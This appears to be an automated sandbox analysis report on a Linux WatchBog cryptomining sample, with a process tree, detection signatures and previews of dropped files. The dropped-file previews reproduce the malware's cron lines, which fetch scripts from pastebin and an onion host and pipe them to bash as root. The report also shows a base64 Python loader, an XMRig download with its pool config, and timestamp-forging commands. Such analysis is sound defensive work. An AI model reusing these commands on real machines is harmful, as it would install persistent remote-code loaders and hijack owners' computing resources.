Source: /bin/chmod (PID: 19491)File: /etc/cron.hourly/oanacroane (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 19492)File: /etc/cron.daily/oanacroane (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 19493)File: /etc/cron.monthly/oanacroane (bits: - usr: rx grp: rx all: rwx)
Source: /bin/tar (PID: 19712)File: /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notls (bits: - usr: rx grp: rx all: rwx)
Source: /bin/tar (PID: 19712)File: /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig (bits: - usr: rx grp: rx all: rwx)
Source: /bin/tar (PID: 19712)File: /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1 (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 19749)File: /bin/watchbog (bits: - usr: rwx grp: rwx all: rwx)
Writes ELF files to disk
Source: /bin/tar (PID: 19712)File written: /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notls
Source: /bin/tar (PID: 19712)File written: /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig
Writes crontab-like entries to files under /var or /etc, typically for achieving persistence
Source: /bin/bash (PID: 19147)Crontab like entry written: /etc/crontab
Source: /bin/sed (PID: 19308)Crontab like entry written: /etc/seddlpHGC
Source: /bin/sed (PID: 19310)Crontab like entry written: /etc/sedTLJ6tF

Hooking and other Techniques for Hiding and Protection:

Drops files in suspicious directories
Source: /bin/bash (PID: 19147)File: /bin/httpntp
Source: /usr/bin/curl (PID: 19335)File: /bin/ftpsdns
Source: /usr/bin/base64 (PID: 19638)File: /bin/config.json
Source: ./watchbog (PID: 19753)File: /bin/config.json
Drops files with innocent-looking names
Source: /bin/bash (PID: 19147)Path: /etc/cron.d/apache
Executes the "base64" command used to encode or decode data (e.g. files, payloads)
Source: /bin/bash (PID: 19158)Base64 executable: /usr/bin/base64 -> base64 -d
Source: /bin/bash (PID: 19166)Base64 executable: /usr/bin/base64 -> base64 -d
Source: /bin/bash (PID: 19174)Base64 executable: /usr/bin/base64 -> base64 -d
Source: /bin/bash (PID: 19189)Base64 executable: /usr/bin/base64 -> base64 -d
Source: /bin/bash (PID: 19200)Base64 executable: /usr/bin/base64 -> base64 -d
Source: /bin/bash (PID: 19211)Base64 executable: /usr/bin/base64 -> base64 -d
Source: /bin/bash (PID: 19629)Base64 executable: /usr/bin/base64 -> base64 -d
Source: /bin/bash (PID: 19632)Base64 executable: /usr/bin/base64 -> base64 -d
Source: /bin/bash (PID: 19635)Base64 executable: /usr/bin/base64 -> base64 -d
Source: /bin/bash (PID: 19638)Base64 executable: /usr/bin/base64 -> base64 -d

Malware Analysis System Evasion:

Executes the "sleep" command used to delay execution and potentially evade sandboxes
Source: /bin/bash (PID: 19754)Sleep executable: /bin/sleep -> sleep 15
Source: /bin/bash (PID: 19850)Sleep executable: /bin/sleep -> sleep 30
Reads CPU information from /sys, indicative of miner or evasive malware
Source: ./watchbog (PID: 19753)Reads CPU info from /sys: /sys/devices/system/cpu/online
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /bin/bash (PID: 19147)Queries kernel information via 'uname':
Source: /bin/uname (PID: 19235)Queries kernel information via 'uname':
Source: /bin/uname (PID: 19245)Queries kernel information via 'uname':
Source: /bin/ps (PID: 19263)Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 19335)Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 19462)Queries kernel information via 'uname':
Source: /bin/ps (PID: 19522)Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 19642)Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 19691)Queries kernel information via 'uname':
Source: ./watchbog (PID: 19753)Queries kernel information via 'uname':
Source: /bin/ps (PID: 19802)Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 19839)Queries kernel information via 'uname':

Lowering of HIPS / PFW / Operating System Security Settings:

Removes protection from files
Source: /bin/bash (PID: 19306)Args: chattr -i /etc/crontab
Source: /bin/bash (PID: 19364)Args: chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root


Runtime Messages

Command:bash "/tmp/AEjyioBcTB"
Exit Code:
Exit Code Info:
Killed:True
Standard Output:I am root
Setting Up Sys Cron
xmrig-2.14.1/
xmrig-2.14.1/config.json
xmrig-2.14.1/xmrig-notls
xmrig-2.14.1/xmrig
Standard Error:chattr: No such file or directory while trying to stat /etc/cron.d/root
chattr: No such file or directory while trying to stat /etc/cron.d/apache
chattr: No such file or directory while trying to stat /var/spool/cron/root
chattr: No such file or directory while trying to stat /var/spool/cron/crontabs/root
sed: can't read /etc/cron.d/root: No such file or directory
sed: can't read /etc/cron.d/apache: No such file or directory
sed: can't read /etc/cron.d/system: No such file or directory
sed: can't read /var/spool/cron/crontabs/root: No such file or directory
sed: can't read /var/spool/cron/root: No such file or directory

Behavior Graph

The rendered behavior graph is not reproduced here; the node information it carried is as follows.

Behavior Graph ID: 922045, Sample: AEjyioBcTB, Startdate: 25/07/2019, Architecture: LINUX, Score: 96

  • Network: pastebin.com; 37.59.54.205 (ports 60262, 80; unknown; France); 5 other IPs or domains
  • Signatures: Malicious sample detected (through community Yara rule); Yara detected Linux WatchBog; Detected Stratum mining protocol; Connects to a pastebin service (likely for C&C); Drops files in suspicious directories; Sample tries to persist itself using cron; Sets full permissions to files and/or directories; Explicitly modifies time stamps using the "touch" command; 4 other signatures
  • Dropped files: /var/spool/cron/root (ASCII), /var/spool/cron/crontabs/root (ASCII), /etc/crontab (ASCII), 7 other malicious files; /bin/config.json (ASCII); /tmp/.tmpdropoff/d...-2.14.1/xmrig-notls (ELF); /tmp/.tmpdropoff/d.../xmrig-2.14.1/xmrig (ELF); /bin/ftpsdns (ASCII)
  • Processes: bash (root of the tree) starts bash, bash nohup watchbog, bash tar and 56 other processes; these in turn start bash curl, tar gzip, bash uname (twice), bash getconf, bash curl and 34 other processes

Yara Overview

Initial Sample

Source: AEjyioBcTB
Rule: JoeSecurity_WatchBog_Cython
Description: Yara detected Linux WatchBog
Author: unknown
Strings:
  • 0x3bce:$c0: /tmp/.tmplassstgggzzzqpppppp12233333
  • 0x3c03:$c0: /tmp/.tmplassstgggzzzqpppppp12233333
  • 0x25fa:$c1: watchbog
  • 0x2866:$c1: watchbog
  • 0x2913:$c1: watchbog
  • 0x2954:$c1: watchbog
  • 0x2972:$c1: watchbog
  • 0x2987:$c1: watchbog
  • 0x29b6:$c1: watchbog
  • 0x2a0e:$c1: watchbog
  • 0x2a43:$c1: watchbog
  • 0x2a61:$c1: watchbog
  • 0x2a76:$c1: watchbog
  • 0x2aa5:$c1: watchbog
  • 0x2ae1:$c1: watchbog
  • 0x2b22:$c1: watchbog
  • 0x2b40:$c1: watchbog
  • 0x2b55:$c1: watchbog
  • 0x2b84:$c1: watchbog
  • 0x2be0:$c1: watchbog
  • 0x2e8b:$c1: watchbog

PCAP (Network Traffic)

No yara matches

Dropped Files

Source: /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notls
Rule: XMRIG_Monero_Miner
Description: Detects Monero mining software
Author: Florian Roth
Strings:
  • 0x22c8b2:$s2: --cpu-affinity set process affinity to CPU core(s), mask 0x3 for cores 0 and 1
  • 0x22c5ca:$s3: -p, --pass=PASSWORD password for mining server

Antivirus and Machine Learning Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Startup

  • system is lnxubuntu1
  • bash (PID: 19147, Parent: 19098, MD5: 5e666695cf08d1638bb85684e30185ee) Arguments: /bin/bash /tmp/AEjyioBcTB
    • bash New Fork (PID: 19155, Parent: 19147)
      • bash New Fork (PID: 19157, Parent: 19155)
      • bash New Fork (PID: 19158, Parent: 19155)
      • base64 (PID: 19158, Parent: 19155, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19163, Parent: 19147)
      • bash New Fork (PID: 19165, Parent: 19163)
      • bash New Fork (PID: 19166, Parent: 19163)
      • base64 (PID: 19166, Parent: 19163, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19170, Parent: 19147)
      • bash New Fork (PID: 19173, Parent: 19170)
      • bash New Fork (PID: 19174, Parent: 19170)
      • base64 (PID: 19174, Parent: 19170, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19183, Parent: 19147)
      • bash New Fork (PID: 19188, Parent: 19183)
      • bash New Fork (PID: 19189, Parent: 19183)
      • base64 (PID: 19189, Parent: 19183, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19196, Parent: 19147)
      • bash New Fork (PID: 19199, Parent: 19196)
      • bash New Fork (PID: 19200, Parent: 19196)
      • base64 (PID: 19200, Parent: 19196, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19208, Parent: 19147)
      • bash New Fork (PID: 19210, Parent: 19208)
      • bash New Fork (PID: 19211, Parent: 19208)
      • base64 (PID: 19211, Parent: 19208, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19216, Parent: 19147)
    • whoami (PID: 19216, Parent: 19147, MD5: a88b7850f1cdbf532f14069816273b63) Arguments: whoami
    • bash New Fork (PID: 19226, Parent: 19147)
      • bash New Fork (PID: 19231, Parent: 19226)
        • bash New Fork (PID: 19235, Parent: 19231)
        • uname (PID: 19235, Parent: 19231, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: uname -m
      • bash New Fork (PID: 19241, Parent: 19226)
        • bash New Fork (PID: 19245, Parent: 19241)
        • uname (PID: 19245, Parent: 19241, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: uname -i
      • bash New Fork (PID: 19249, Parent: 19226)
        • bash New Fork (PID: 19251, Parent: 19249)
        • getconf (PID: 19251, Parent: 19249, MD5: fb82f5a117dcfb922b370bf3a50c5c0a) Arguments: getconf LONG_BIT
    • bash New Fork (PID: 19259, Parent: 19147)
      • bash New Fork (PID: 19263, Parent: 19259)
      • ps (PID: 19263, Parent: 19259, MD5: 37339e5441057d422e61e8a471505337) Arguments: ps -fe
      • bash New Fork (PID: 19264, Parent: 19259)
      • grep (PID: 19264, Parent: 19259, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep watchbog
      • bash New Fork (PID: 19265, Parent: 19259)
      • grep (PID: 19265, Parent: 19259, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v grep
      • bash New Fork (PID: 19266, Parent: 19259)
      • wc (PID: 19266, Parent: 19259, MD5: 0d6e0835ddbd0b179ae07b6317c676d4) Arguments: wc -l
    • bash New Fork (PID: 19306, Parent: 19147)
    • chattr (PID: 19306, Parent: 19147, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -i /etc/crontab
    • bash New Fork (PID: 19307, Parent: 19147)
    • rm (PID: 19307, Parent: 19147, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /bin/httpntp /bin/ftpsdns
    • bash New Fork (PID: 19308, Parent: 19147)
    • sed (PID: 19308, Parent: 19147, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /httpntp/d /etc/crontab
    • bash New Fork (PID: 19310, Parent: 19147)
    • sed (PID: 19310, Parent: 19147, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /ftpsdns/d /etc/crontab
    • bash New Fork (PID: 19324, Parent: 19147)
    • chmod (PID: 19324, Parent: 19147, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 755 /bin/httpntp
    • bash New Fork (PID: 19330, Parent: 19147)
      • bash New Fork (PID: 19335, Parent: 19330)
      • curl (PID: 19335, Parent: 19330, MD5: 53ea41160209f7801a5d5f07b546a9cd) Arguments: curl -fsSL https://pastebin.com/raw/4HvzGfGm
    • bash New Fork (PID: 19362, Parent: 19147)
    • chmod (PID: 19362, Parent: 19147, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 755 /bin/ftpsdns
    • bash New Fork (PID: 19363, Parent: 19147)
    • touch (PID: 19363, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/sh /etc/crontab
    • bash New Fork (PID: 19364, Parent: 19147)
    • chattr (PID: 19364, Parent: 19147, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root
    • bash New Fork (PID: 19365, Parent: 19147)
    • rm (PID: 19365, Parent: 19147, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane
    • bash New Fork (PID: 19366, Parent: 19147)
    • mkdir (PID: 19366, Parent: 19147, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir -p /var/spool/cron/crontabs
    • bash New Fork (PID: 19367, Parent: 19147)
    • mkdir (PID: 19367, Parent: 19147, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir -p /etc/cron.hourly
    • bash New Fork (PID: 19368, Parent: 19147)
    • mkdir (PID: 19368, Parent: 19147, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir -p /etc/cron.daily
    • bash New Fork (PID: 19370, Parent: 19147)
    • mkdir (PID: 19370, Parent: 19147, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir -p /etc/cron.monthly
    • bash New Fork (PID: 19373, Parent: 19147)
    • sed (PID: 19373, Parent: 19147, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /pastebin.com/d /etc/cron.d/root
    • bash New Fork (PID: 19387, Parent: 19147)
    • sed (PID: 19387, Parent: 19147, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /pastebin.com/d /etc/cron.d/apache
    • bash New Fork (PID: 19404, Parent: 19147)
    • sed (PID: 19404, Parent: 19147, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /pastebin.com/d /etc/cron.d/system
    • bash New Fork (PID: 19421, Parent: 19147)
    • sed (PID: 19421, Parent: 19147, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /pastebin.com/d /var/spool/cron/crontabs/root
    • bash New Fork (PID: 19438, Parent: 19147)
    • sed (PID: 19438, Parent: 19147, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /pastebin.com/d /var/spool/cron/root
    • bash New Fork (PID: 19452, Parent: 19147)
      • bash New Fork (PID: 19459, Parent: 19452)
        • bash New Fork (PID: 19462, Parent: 19459)
        • curl (PID: 19462, Parent: 19459, MD5: 53ea41160209f7801a5d5f07b546a9cd) Arguments: curl -fsSL https://pastebin.com/raw/EzqVke6X
    • bash New Fork (PID: 19491, Parent: 19147)
    • chmod (PID: 19491, Parent: 19147, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 755 /etc/cron.hourly/oanacroane
    • bash New Fork (PID: 19492, Parent: 19147)
    • chmod (PID: 19492, Parent: 19147, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 755 /etc/cron.daily/oanacroane
    • bash New Fork (PID: 19493, Parent: 19147)
    • chmod (PID: 19493, Parent: 19147, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 755 /etc/cron.monthly/oanacroane
    • bash New Fork (PID: 19494, Parent: 19147)
    • touch (PID: 19494, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/sh /var/spool/cron/root
    • bash New Fork (PID: 19495, Parent: 19147)
    • touch (PID: 19495, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/sh /var/spool/cron/crontabs/root
    • bash New Fork (PID: 19496, Parent: 19147)
    • touch (PID: 19496, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/sh /etc/cron.d/system
    • bash New Fork (PID: 19497, Parent: 19147)
    • touch (PID: 19497, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/sh /etc/cron.d/apache
    • bash New Fork (PID: 19498, Parent: 19147)
    • touch (PID: 19498, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/sh /etc/cron.d/root
    • bash New Fork (PID: 19500, Parent: 19147)
    • touch (PID: 19500, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/sh /etc/cron.hourly/oanacroane
    • bash New Fork (PID: 19503, Parent: 19147)
    • touch (PID: 19503, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/sh /etc/cron.daily/oanacroane
    • bash New Fork (PID: 19507, Parent: 19147)
    • touch (PID: 19507, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/sh /etc/cron.monthly/oanacroane
    • bash New Fork (PID: 19518, Parent: 19147)
      • bash New Fork (PID: 19522, Parent: 19518)
      • ps (PID: 19522, Parent: 19518, MD5: 37339e5441057d422e61e8a471505337) Arguments: ps -fe
      • bash New Fork (PID: 19523, Parent: 19518)
      • grep (PID: 19523, Parent: 19518, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep watchbog
      • bash New Fork (PID: 19524, Parent: 19518)
      • grep (PID: 19524, Parent: 19518, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v grep
      • bash New Fork (PID: 19525, Parent: 19518)
      • wc (PID: 19525, Parent: 19518, MD5: 0d6e0835ddbd0b179ae07b6317c676d4) Arguments: wc -l
    • bash New Fork (PID: 19627, Parent: 19147)
      • bash New Fork (PID: 19628, Parent: 19627)
      • bash New Fork (PID: 19629, Parent: 19627)
      • base64 (PID: 19629, Parent: 19627, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19630, Parent: 19147)
      • bash New Fork (PID: 19631, Parent: 19630)
      • bash New Fork (PID: 19632, Parent: 19630)
      • base64 (PID: 19632, Parent: 19630, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19633, Parent: 19147)
      • bash New Fork (PID: 19634, Parent: 19633)
      • bash New Fork (PID: 19635, Parent: 19633)
      • base64 (PID: 19635, Parent: 19633, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19636, Parent: 19147)
    • rm (PID: 19636, Parent: 19147, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /bin/config.json /bin/watchbog
    • bash New Fork (PID: 19637, Parent: 19147)
      • bash New Fork (PID: 19642, Parent: 19637)
      • curl (PID: 19642, Parent: 19637, MD5: 53ea41160209f7801a5d5f07b546a9cd) Arguments: curl -fsSL https://pastebin.com/raw/dXD2Bs0H
    • bash New Fork (PID: 19638, Parent: 19147)
    • base64 (PID: 19638, Parent: 19147, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19689, Parent: 19147)
    • mkdir (PID: 19689, Parent: 19147, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir -p /tmp/.tmpdropoff//dataoutput/
    • bash New Fork (PID: 19690, Parent: 19147)
      • bash New Fork (PID: 19691, Parent: 19690)
      • curl (PID: 19691, Parent: 19690, MD5: 53ea41160209f7801a5d5f07b546a9cd) Arguments: curl -fsSL https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz -o /tmp/.tmpdropoff/rig.tar.gz
    • bash New Fork (PID: 19712, Parent: 19147)
    • tar (PID: 19712, Parent: 19147, MD5: dbc4507f4db5b41f7358b28bce65a15d) Arguments: tar -xzvf /tmp/.tmpdropoff/rig.tar.gz -C /tmp/.tmpdropoff//dataoutput/
      • tar New Fork (PID: 19721, Parent: 19712)
      • gzip (PID: 19721, Parent: 19712, MD5: 25ea567880cec4ac02e7a77ad304e3c6) Arguments: gzip -d
    • bash New Fork (PID: 19743, Parent: 19147)
    • mv (PID: 19743, Parent: 19147, MD5: 0cdfdd010d5f4acab64a1d89066c92e9) Arguments: mv /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notls /bin/watchbog
    • bash New Fork (PID: 19744, Parent: 19147)
    • rm (PID: 19744, Parent: 19147, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /tmp/.tmpdropoff/
    • bash New Fork (PID: 19749, Parent: 19147)
    • chmod (PID: 19749, Parent: 19147, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 777 /bin/watchbog
    • bash New Fork (PID: 19753, Parent: 19147)
    • nohup (PID: 19753, Parent: 19147, MD5: 3b11bb9dc8a020bb26e3cf5cf1da3cba) Arguments: nohup ./watchbog
    • watchbog (PID: 19753, Parent: 19147, MD5: unknown) Arguments: ./watchbog
    • bash New Fork (PID: 19754, Parent: 19147)
    • sleep (PID: 19754, Parent: 19147, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 15
    • bash New Fork (PID: 19801, Parent: 19147)
      • bash New Fork (PID: 19802, Parent: 19801)
      • ps (PID: 19802, Parent: 19801, MD5: 37339e5441057d422e61e8a471505337) Arguments: ps -fe
      • bash New Fork (PID: 19803, Parent: 19801)
      • grep (PID: 19803, Parent: 19801, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep watchbog
      • bash New Fork (PID: 19804, Parent: 19801)
      • grep (PID: 19804, Parent: 19801, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v grep
      • bash New Fork (PID: 19805, Parent: 19801)
      • wc (PID: 19805, Parent: 19801, MD5: 0d6e0835ddbd0b179ae07b6317c676d4) Arguments: wc -l
    • bash New Fork (PID: 19838, Parent: 19147)
      • bash New Fork (PID: 19839, Parent: 19838)
      • curl (PID: 19839, Parent: 19838, MD5: 53ea41160209f7801a5d5f07b546a9cd) Arguments: curl -fsSL https://pastebin.com/raw/LUN80Hj8
    • bash New Fork (PID: 19849, Parent: 19147)
    • touch (PID: 19849, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch /tmp/.tmpc
    • bash New Fork (PID: 19850, Parent: 19147)
    • sleep (PID: 19850, Parent: 19147, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 30
  • cleanup

Created / dropped Files

/bin/config.json
Process:./watchbog
File Type:ASCII text
Size (bytes):1183
Entropy (8bit):4.286659623437755
Encrypted:false
MD5:D3B1DDBAF0FAA77C317C0DF332C63FC2
SHA1:0D34FDA949A9D508DE0E2EB6834672F55BC4B83D
SHA-256:7C3184B387482C40B25838AD3627FD817E0CEBE4F097178D29446B64BC1E17E0
SHA-512:0680ED31448FCDE464516F8447E7945D3A3DF2B071BDECD549613639A99F0806F02028B43114351A797B46164AA3022697E8AC03C0AD3BE1C200D7F1F96B36FA
Malicious:true
Reputation:low
Preview:{. "algo": "cryptonight",. "api": {. "port": 0,. "access-token": null,. "id": null,. "worker-id": null,. "ipv6": false,. "restricted": true. },. "asm": true,. "autosave": true,. "av": 0,. "background": false,. "colors": false,. "cpu-affinity": null,. "cpu-priority": null,. "donate-level": 1,. "huge-pages": true,. "hw-aes": null,. "log-file": null,. "max-cpu-usage": 100,. "pools": [. {. "url": "pool.minexmr.com:80",. "user": "47k2wdnyyBoMT6N9ho5Y7uQg1J6gPsTboKP6JXfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7.old",. "pass": "x",. "rig-id": null,. "nicehash": false,. "keepalive": false,. "variant": -1,. "enabled": true,. "tls": false,. "tls-fingerprint": null. }. ],. "print-time": 60,. "retries": 5,. "retry-pause": 5,. "safe": false,. "threads": [.
/bin/ftpsdns
Process:/usr/bin/curl
File Type:ASCII text, with very long lines, with no line terminators
Size (bytes):1028
Entropy (8bit):5.620962650757794
Encrypted:false
MD5:90AE88815BEFE7743FC74D363EEE56D6
SHA1:7474FEDDE5E494485AF620606E906F79639A97AF
SHA-256:67B912D342C7A920891D05EDCFA39E0F61EA45762DD1B75646E18B5125BC0493
SHA-512:45A207D382BED85DED98F87B3C7BD5BB5A66BE75E4006590A83B1A410D1362B7977383F00D399719A1C4C07CA36713ACFFEF48BD96CC1DFCC07B6CE9AF59015A
Malicious:true
Reputation:low
Preview:python -c "import base64;exec(base64.b64decode('[preview truncated]
/bin/httpntp
Process:/bin/bash
File Type:ASCII text
Size (bytes):251
Entropy (8bit):5.127166124667473
Encrypted:false
MD5:037CD5F038C009615C69177D3E4EC55F
SHA1:8BD1B372D04D746B6CB1D3BCB316D56561B9A723
SHA-256:C9564305899A8DA4B61C06AD53F86B9EC062314933CDB29F27585A9E9BDC1739
SHA-512:C009A944F400DBA5D45AFDBC4F5FC24D058E274B33AB4D4C8192AF8C76D9B4844315EC482A0F1AD8078202C52C274E42570097327730AA38727B5762F2F5568A
Malicious:true
Reputation:low
Preview:(python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash.##.
/etc/cron.d/apache
Process:/bin/bash
File Type:ASCII text, with very long lines
Size (bytes):455
Entropy (8bit):5.230146200081588
Encrypted:false
MD5:5E8CE3D79B23296F6EF7FF1DADE33BE0
SHA1:3C89AFF6E716C3F2BDC005CB9881AF14422073D0
SHA-256:3C2591CCA36F368C06C8C57C139938BB5A8BA3D8309D09BD8EE3AA9D2DFC1C37
SHA-512:15238D11FA0CCCAD7FA98CAE65E98E92A180ABAD661B19FF50676E69F5B3237E606220F6537DA6A074C714244BFB3A9E48DF0D4ECB6457E92C8DC1E600655BDB
Malicious:true
Reputation:low
Preview:*/7 * * * * root (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash.##.
/etc/cron.d/root
Process:/bin/bash
File Type:ASCII text, with very long lines
Size (bytes):455
Entropy (8bit):5.230146200081588
Encrypted:false
MD5:487EB5C09FD171D7865399AA61B00675
SHA1:EC4EBE4544F51BD17D410D4506448FC757FD18A8
SHA-256:07D3FFB888E693E607F6880FBDD8EA3BB1C7139F6E706B72E38095A4A87A4352
SHA-512:919E68BF5E76595E3D5FAF9551316EFFE7B8E8164197A79568F061B1E19CD80F58ED2AF7540454D5D831CD47914079F2D5D0A174E0110F18700BD29ADCD5BA1D
Malicious:true
Reputation:low
Preview:*/3 * * * * root (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash.##.
/etc/cron.d/system
Process:/bin/bash
File Type:ASCII text, with very long lines
Size (bytes):455
Entropy (8bit):5.229068782508681
Encrypted:false
MD5:7EBFDC06C92D0A74407A215A6EDE31CA
SHA1:62F9EA3EF125AA2517E9B5AD881B886CC941506C
SHA-256:5182729F00AD71F1922711F4784CEA1B179E29FFDDA34C8FDF0948FBCE68EE76
SHA-512:198220B64BE635CA1FC7C7A3C3C9A97FA04453A02208A3ECD23981E154A99B2CB41B42A84AE2300A31BDD33F01F35A590908FD6E6CE6D2CF2190570F116F78C3
Malicious:true
Reputation:low
Preview:*/6 * * * * root (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash.##.
/etc/cron.daily/oanacroane
Process:/bin/bash
File Type:ASCII text
Size (bytes):112
Entropy (8bit):4.928465164415504
Encrypted:false
MD5:97043F28E3840399AB34E377F442D99A
SHA1:6F8473D173F1917EDA7AD2C385FBED24631FE218
SHA-256:C72B4C065F2AC0227CD36870A1680AC1E06E72A47A1169C53D60BD9B44B2D01E
SHA-512:C54216A405495C6FE4F443A2C5B2E5508C23F013629B4689BFD6EFD94B6B51101A2A56AB1B7C2AA2E32D3D4B798D841AAE2ABD783D57415B0087BA24EF3E9563
Malicious:true
Reputation:low
Preview:(curl -fsSL https://pastebin.com/raw/KJcZ9HLL||wget -q -O - https://pastebin.com/raw/KJcZ9HLL)| base64 -d |bash.
/etc/cron.hourly/oanacroane
Process:/bin/bash
